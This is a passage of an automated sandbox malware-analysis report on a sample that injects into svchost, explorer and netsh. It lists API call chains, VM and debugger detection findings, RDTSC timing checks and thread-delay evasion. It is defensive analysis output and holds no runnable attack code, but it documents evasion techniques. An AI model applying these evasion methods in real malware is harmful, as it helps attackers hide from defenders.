          Source: Binary string: wntdll.pdb source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
          Source: 8t1uarSZFV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 8t1uarSZFV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 8t1uarSZFV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 8t1uarSZFV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 8t1uarSZFV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA42DE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC0A76 push ecx; ret 0_2_00FC0A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004191ED push ecx; iretd 1_2_004191EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F365 pushad ; ret 1_2_0040F36D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418389 push esp; iretd 1_2_0041838B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164DA push edi; retf 1_2_004164FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4F2 push eax; ret 1_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4FB push eax; ret 1_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4A5 push eax; ret 1_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D55C push eax; ret 1_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407726 push esp; iretd 1_2_00407729
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA225F pushad ; ret 1_2_02FA27F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA27FA pushad ; ret 1_2_02FA27F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA283D push eax; iretd 1_2_02FA2858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD09AD push ecx; mov dword ptr [esp], ecx1_2_02FD09B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA1366 push eax; iretd 1_2_02FA1369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECE9B5 push esp; retn 0000h1_2_00ECEAE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECEB02 push esp; retn 0000h1_2_00ECEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECEB1E push esp; retn 0000h1_2_00ECEB1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63AB02 push esp; retn 0000h2_2_0F63AB03
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63AB1E push esp; retn 0000h2_2_0F63AB1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63A9B5 push esp; retn 0000h2_2_0F63AAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB819B5 push esp; retn 0000h2_2_0FB81AE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB81B1E push esp; retn 0000h2_2_0FB81B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB81B02 push esp; retn 0000h2_2_0FB81B03
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_01569C4D push ecx; ret 3_2_01569C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0358225F pushad ; ret 3_2_035827F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035827FA pushad ; ret 3_2_035827F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035B09AD push ecx; mov dword ptr [esp], ecx3_2_035B09B6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0358283D push eax; iretd 3_2_03582858
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0358135E push eax; iretd 3_2_03581369
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_009591ED push ecx; iretd 3_2_009591EE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FBF98E
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01031C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01031C41
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98200
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeAPI/Special instruction interceptor: Address: F03204
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 949904 second address: 94990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 949B6E second address: 949B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3281Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6650Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1242Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8729Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeAPI coverage: 4.0 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep count: 3281 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep time: -6562000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep count: 6650 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep time: -13300000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep count: 1242 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep time: -2484000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep count: 8729 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep time: -17458000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100DBBE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0101698F
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010168EE FindFirstFileW,FindClose,0_2_010168EE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0100D076
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0100D3A9
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101979D
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01019642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01019642
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01019B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01019B2B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01015C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01015C97
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA42DE
          Source: explorer.exe, 00000002.00000002.4152119162.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1713933761.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000002.4147214666.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.4152119162.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000002.4152411562.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000000.1713933761.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000002.4152411562.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000002.4148832143.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000002.4150997601.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101EAA2 BlockInput,0_2_0101EAA2
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD2622
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA42DE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00FC4CE8
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00F034D0 mov eax, dword ptr fs:[00000030h]0_2_00F034D0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00F03470 mov eax, dword ptr fs:[00000030h]0_2_00F03470
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00F01E70 mov eax, dword ptr fs:[00000030h]0_2_00F01E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A30B mov eax, dword ptr fs:[00000030h]1_2_0300A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A30B mov eax, dword ptr fs:[00000030h]1_2_0300A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A30B mov eax, dword ptr fs:[00000030h]1_2_0300A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02E1 mov eax, dword ptr fs:[00000030h]1_2_02FE02E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02E1 mov eax, dword ptr fs:[00000030h]1_2_02FE02E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02E1 mov eax, dword ptr fs:[00000030h]1_2_02FE02E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A8324 mov eax, dword ptr fs:[00000030h]1_2_030A8324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A8324 mov ecx, dword ptr fs:[00000030h]1_2_030A8324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A8324 mov eax, dword ptr fs:[00000030h]1_2_030A8324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A8324 mov eax, dword ptr fs:[00000030h]1_2_030A8324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_02FDA2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_02FDA2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_02FDA2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_02FDA2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_02FDA2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A634F mov eax, dword ptr fs:[00000030h]1_2_030A634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052349 mov eax, dword ptr fs:[00000030h]1_2_03052349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03078350 mov ecx, dword ptr fs:[00000030h]1_2_03078350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov eax, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov eax, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov eax, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov ecx, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov eax, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305035C mov eax, dword ptr fs:[00000030h]1_2_0305035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309A352 mov eax, dword ptr fs:[00000030h]1_2_0309A352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02A0 mov eax, dword ptr fs:[00000030h]1_2_02FE02A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02A0 mov eax, dword ptr fs:[00000030h]1_2_02FE02A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307437C mov eax, dword ptr fs:[00000030h]1_2_0307437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC826B mov eax, dword ptr fs:[00000030h]1_2_02FC826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4260 mov eax, dword ptr fs:[00000030h]1_2_02FD4260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4260 mov eax, dword ptr fs:[00000030h]1_2_02FD4260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4260 mov eax, dword ptr fs:[00000030h]1_2_02FD4260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6259 mov eax, dword ptr fs:[00000030h]1_2_02FD6259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA250 mov eax, dword ptr fs:[00000030h]1_2_02FCA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308C3CD mov eax, dword ptr fs:[00000030h]1_2_0308C3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030563C0 mov eax, dword ptr fs:[00000030h]1_2_030563C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC823B mov eax, dword ptr fs:[00000030h]1_2_02FC823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030743D4 mov eax, dword ptr fs:[00000030h]1_2_030743D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030743D4 mov eax, dword ptr fs:[00000030h]1_2_030743D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E3DB mov eax, dword ptr fs:[00000030h]1_2_0307E3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E3DB mov eax, dword ptr fs:[00000030h]1_2_0307E3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E3DB mov ecx, dword ptr fs:[00000030h]1_2_0307E3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E3DB mov eax, dword ptr fs:[00000030h]1_2_0307E3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030063FF mov eax, dword ptr fs:[00000030h]1_2_030063FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_02FEE3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_02FEE3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_02FEE3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h]1_2_02FE03E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD83C0 mov eax, dword ptr fs:[00000030h]1_2_02FD83C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD83C0 mov eax, dword ptr fs:[00000030h]1_2_02FD83C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD83C0 mov eax, dword ptr fs:[00000030h]1_2_02FD83C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD83C0 mov eax, dword ptr fs:[00000030h]1_2_02FD83C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
